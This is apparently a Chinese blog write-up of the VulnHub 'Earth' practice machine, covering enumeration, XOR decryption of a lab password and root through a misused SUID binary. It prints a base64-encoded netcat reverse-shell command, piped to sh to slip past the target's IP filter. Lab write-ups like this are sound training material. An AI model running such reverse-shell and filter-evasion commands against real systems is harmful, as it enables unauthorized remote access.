earth靶机详解

最新推荐文章于 2024-04-09 17:26:48 发布
最新推荐文章于 2024-04-09 17:26:48 发布
阅读量187 收藏 1
点赞数
分类专栏: 打靶机系列 文章标签: 服务器 运维 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/132029411
版权

earth靶机复盘

靶场下载地址:https://download.vulnhub.com/theplanets/Earth.ova

这个靶场还是非常有意思的,值得去打一下。

我们对拿到的ip进行一个单独全面的扫描,发现有两个DNS解析。

image-20230729184404010

就把这两条解析添加到hosts文件中去,要么无法打开网站。

image-20230729184619820

这样网站就可以正常打开了。

image-20230729184652068

扫描ip时候我们发现443是打开的,扫描第二个dns解析的443端口能扫描出来一个robots.txt

dirsearch -u https://terratest.earth.local/

image-20230729191237104
打开后我们发现一个notes.*,就是什么后缀名都可以,但是notes明显应该是txt后缀。

image-20230729191424367

打开后我们拿到了一个用户名terra,并且这里告诉了我们一个加密方式是利用XOR异或方式加密的。

image-20230729191453397

这个页面其实就是我们的密钥。

image-20230729192257707

而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字。

image-20230729192405898

在cyberchef把密文先用一个hex解密16进制的解密,然后XOR时候放上我们的密钥,这样就能解密出来了,我们发现解密出来的东西很有规律,复制我们最前面的这一串。

image-20230729192606067

然后在Key的位置放上去,发现作者就是用这一串加密的,能得到相同的output。

image-20230729192626359

因为我们得到一个用户名,一个密钥,其实就是我们的密码,肯定还有一个登陆网站。

这个登陆网站也可以在目录中扫描出来,我这里就不扫描了。

image-20230729192659354

user:terra

passwd:earthclimatechangebad4humans

这样就登陆上来了,发现这里其实是一个shell。

image-20230729192812854

当我们远程时候发现不让我们远程,这里其实是给我们的ip地址做了一个过滤,就是不让我们输入ip地址,只要有ip地址就不行,但是我们可以用别的方法来绕过。

image-20230729193100577

这里我们可以把我们反弹shell加密成base64编码。

image-20230729193138194

然后用echo命令来执行,base64 -d是解码base64,后面加上sh是执行前面的内容,所以这样我们就绕过去不让输入ip地址了。

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAyLjEyOSA4ODg4|base64 -d|sh

同时kali监听一下就拿到了一个shell。

image-20230729193546953

登陆上后我们先usr/bin/script -qc /bin/bash /dev/null拿到一个稳定的shell

用find查找一下又suid权限的文件,发现有一个奇怪的文件,执行了一下发现不能执行。

image-20230729194440182

image-20230729194904600

把这个文件拷贝到我们kali中分析一下,看看是什么问题。

image-20230729194703479

kali监听时候输出到一个文件中去。

image-20230729194651789

file一下发现是个可执行文件,并且文件执行过程中会修改root密码。

image-20230729194719928

给这个文件价格权限就能在本机执行了,但是依然会出错。

然后利用ltrace工具可以分析这个文件执行时候在什么地方出错了。

结果发现是少了三个文件。

image-20230729194839253

我们在kali中创建一下这三个文件,再执行发现执行成功了

并且root密码被修改成Earch了。

image-20230729195136154

su root顺利拿到root权限。

image-20230729195217331

dumplings。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机操作练习,earth 靶机实战练习
09-08
在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行了主机信息收集。通过探测IP地址192.168.119.129,发现靶机上开放了...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3060
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
VulnHub靶场----Earth
qq_61670993的博客
10-18 486
Vulnhub靶场初体验
Earth 靶机实战
最新发布
braty_的博客
04-09 271
这里给出了加密的提示XOR异或加密,应该是要我们解密首页给出的密文。这里发现提权失败,把文件上传到kali,分析一下啥问题。发现君子协议,robots.txt 访问查看内容。发现文件,尝试访问,发现格式为 .txt。发现登陆页面,但不存在SQL注入。密文只有第三个是密码。
vulnhub-Earth靶场练习
ljlrookiebird的博客
09-26 100
vulhub-earth靶场练习
2-vulnhub靶场,Earth
qq_49078152的博客
08-14 1645
vulnhub,earth靶机练习
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 958
靶机渗透练习-The Planets:Earth
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Planets Earth, Mars and the Moon
12-04
该包提供了这些逼真的行星:地球,火星和月球。五百多mb,高清 Features: - Works on Unity 5 and Unity 4. ( 2 versions ) - Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly customizable shaders with normals, night lights, specular, and inner atmosheric scattering effect. - Separated clouds and clouds shadows. - Outer atmosphere shader with scattering effect. - High polygon sphere (about 40000 triangles) - A set of 8K textures - Milky Way skybox - Included demo scene that shows how everything works.
planet_Earth靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-01 905
planet_Earth 靶场渗透记录
靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2279
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
VulnHub-Earth打靶记录
qq_43534481的博客
04-19 2334
VulnHub-Earth 打靶记录 详细解题思路
vulnhub靶场The Planets Earth教程
m0_73248913的博客
01-20 390
可以发现触发条件是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe存在(后来尝试发现是需要三个文件都存在)在靶机上用touch命令创建这三个文件,创建完成后再执行/usr/bin/reset_root,执行成功,显示root的密码被修改成了Earth。从/usr/bin/reset_root执行失败的返回信息来看,是需要触发条件的,直接执行的话,触发条件都不满足。靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口。
Earth靶机实验实战演练
lianliandad的博客
11-01 925
好好学习
vulnhub——Earth靶机
Re1_zf的博客
10-28 2044
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1024
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值